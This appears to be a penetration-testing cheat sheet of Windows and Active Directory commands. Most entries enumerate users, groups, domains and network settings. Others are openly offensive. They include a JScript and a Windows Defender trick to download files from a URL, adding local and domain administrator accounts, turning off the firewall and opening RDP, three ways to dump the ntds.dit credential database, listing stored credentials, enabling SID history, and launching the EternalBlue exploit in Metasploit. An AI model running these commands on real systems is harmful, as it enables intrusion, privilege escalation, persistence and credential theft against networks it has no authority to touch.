- - cmd: accesschk.exe -uwqs Users <c>:\
- lang: sh
- tags: pentest
- desc: find weak file permission
- - cmd: echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); WScript.Echo(WinHttpReq.ResponseText); > fu.js && cscript /nologo fu.js <file_url> > <downloaded_file>
- lang: sh
- tags: pentest
- desc: VBS download file script
- - cmd: net user <username> <password> /ADD
- lang: sh
- tags: pentest
- desc: add user
- - cmd: net user <username> <password> /ADD /DOMAIN
- lang: sh
- tags: pentest
- desc: add user to domain
- - cmd: net localgroup administrators <username> /add
- lang: sh
- tags: pentest
- desc: add user as admin
- - cmd: runas /user:<domain>\<user> cmd.exe
- lang: sh
- tags: pentest
- desc: run as over user
- - cmd: whoami /all
- lang: sh
- tags: pentest
- desc: whoami - All info about me, take a look at the enabled tokens
- - cmd: whoami /priv
- lang: sh
- tags: pentest
- desc: whoami privilegied
- - cmd: net users
- lang: sh
- tags: pentest
- desc: list all users
- - cmd: net group "Admins du domaine"
- lang: sh
- tags: pentest
- desc: list domain admins (fr)
- - cmd: net user <username>
- lang: sh
- tags: pentest
- desc: infos about a user
- - cmd: '[wmi] Win32_userAccount.Domain=<computer_name>,Name="Administrator"'
- lang: ps1
- tags: pentest
- desc: infos on a Administrator and retrieve SID
- - cmd: net accounts
- lang: sh
- tags: pentest
- desc: infos about password policy
- - cmd: qwinsta
- lang: sh
- tags: pentest
- desc: who logged in
- - cmd: cmdkey /list
- lang: sh
- tags: pentest
- desc: List credentials
- - cmd: net localgroup
- lang: sh
- tags: pentest
- desc: show local groups
- - cmd: net localgroup <group_name>
- lang: sh
- tags: pentest
- desc: show specific local group
- - cmd: net group /domain <domain_group_name>
- lang: sh
- tags: pentest
- desc: show domain group users
- - cmd: echo %USERDOMAIN%
- lang: sh
- tags: pentest
- desc: get domain name
- - cmd: echo %USERDNSDOMAIN%
- lang: sh
- tags: pentest
- desc: get domain name (2)
- - cmd: systeminfo | findstr /B /C:"Domain"
- lang: sh
- tags: pentest
- desc: get computer domain name (3)
- - cmd: echo %logonserver%
- lang: sh
- tags: pentest
- desc: get name of the DC
- - cmd: set logonserver #Get name of the domain controller
- lang: sh
- tags: pentest
- desc: get name of the dc (2)
- - cmd: net group /domain
- lang: sh
- tags: pentest
- desc: list of domain groups
- - cmd: net group "domain computers" /domain
- lang: sh
- tags: pentest
- desc: list of computer connected to the domain
- - cmd: net view /domain; nltest /dclist:<domain>
- lang: sh
- tags: pentest
- desc: List all PCs of the domain
- - cmd: net group "Domain Controllers" /domain
- lang: sh
- tags: pentest
- desc: list pc accounts of domain controllers
- - cmd: net group "Domain Admins" /domain
- lang: sh
- tags: pentest
- desc: List users with domain admin privileges
- - cmd: net group "Domain Admins" <username> /add /domain
- lang: sh
- tags: pentest
- desc: Add user to domain admin group
- - cmd: net group "Admins du domaine" <username> /add /domain
- lang: sh
- tags: pentest
- desc: Add user to domain admin group - FR
- - cmd: net localgroup administrators /domain
- lang: sh
- tags: pentest
- desc: List users that belongs to the administrators group inside the domain
- - cmd: net user /domain
- lang: sh
- tags: pentest
- desc: List all domain users
- - cmd: net user <username> /domain
- lang: sh
- tags: pentest
- desc: get user domain information
- - cmd: net accounts /domain
- lang: sh
- tags: pentest
- desc: domain password and lockout policy
- - cmd: nltest /domain_trusts
- lang: sh
- tags: pentest
- desc: get mapping of the trust relationships
- - cmd: ipconfig /all
- lang: sh
- tags: pentest
- desc: all interfaces
- - cmd: route print
- lang: sh
- tags: pentest
- desc: print all routes
- - cmd: arp -a; netstat -ano
- lang: sh
- tags: pentest
- desc: list of know hosts
- - cmd: type C:\WINDOWS\System32\drivers\etc\hosts
- lang: sh
- tags: pentest
- desc: show hosts file
- - cmd: dir /a:h <path>
- lang: sh
- tags: pentest
- desc: list hidden files
- - cmd: dir /s /b
- lang: sh
- tags: pentest
- desc: Recursive list
- - cmd: netsh firewall show state
- lang: sh
- tags: pentest
- desc: show firewall state
- - cmd: netsh firewall show config
- lang: sh
- tags: pentest
- desc: show firewall config
- - cmd: netsh Advfirewall set allprofiles state off
- lang: sh
- tags: pentest
- desc: turn off firewall
- - cmd: netsh firewall set opmode disable
- lang: sh
- tags: pentest
- desc: turn off firewall (2)
- - cmd: netsh Advfirewall set allprofiles state on
- lang: sh
- tags: pentest
- desc: turn on firewall
- - cmd: netsh firewall add portopening TCP 3389 "Remote Desktop"
- lang: sh
- tags: pentest
- desc: firewall open port RDP
- - cmd: ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
- lang: sh
- tags: pentest
- desc: dump ntds.dit (Windows >= 2008 server) - method 1
- - cmd: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
- lang: sh
- tags: pentest
- desc: dump ntds.dit (Windows >= 2008 server) - method 2
- - cmd: 'net start vss && vssadmin create shadow /for=c: && vssadmin list shadows && copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp'
- lang: sh
- tags: pentest
- desc: dump ntds.dit (Windows <= 2003 server)
- - cmd: net view
- lang: sh
- tags: pentest
- desc: list of computer
- - cmd: net view /all /domain <domain_name>
- lang: sh
- tags: pentest
- desc: list of computer shares on the domain
- - cmd: net view \\<ip> \ALL
- lang: sh
- tags: pentest
- desc: list share of a computer
- - cmd: 'net use x: \\<ip>\<share_name>'
- lang: sh
- tags: pentest
- desc: mount share locally
- - cmd: net share
- lang: sh
- tags: pentest
- desc: check current share
- - cmd: '"c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\mpcmdrun.exe" -DownloadFile -url <url> -path <result_file>; mpcmdrun.exe -DownloadFile -url <url> -path <result_file>'
- lang: sh
- tags: pentest
- desc: windows download file with windows defender
- - cmd: nmcli dev show <interface>
- lang: sh
- tags: pentest
- desc: find AD IP - show domain name and dns
- - cmd: nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain_name>
- lang: sh
- tags: pentest
- desc: nslookup AD - domain
- - cmd: netdom trust <source_domain> /d:<target_domain> /enablesidhistory:yes
- lang: sh
- tags: pentest
- desc: enable sid history
- - cmd: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue"
- lang: sh
- tags: pentest
- desc: windows eternal blue - smb - ms17-010 \ No newline at end of file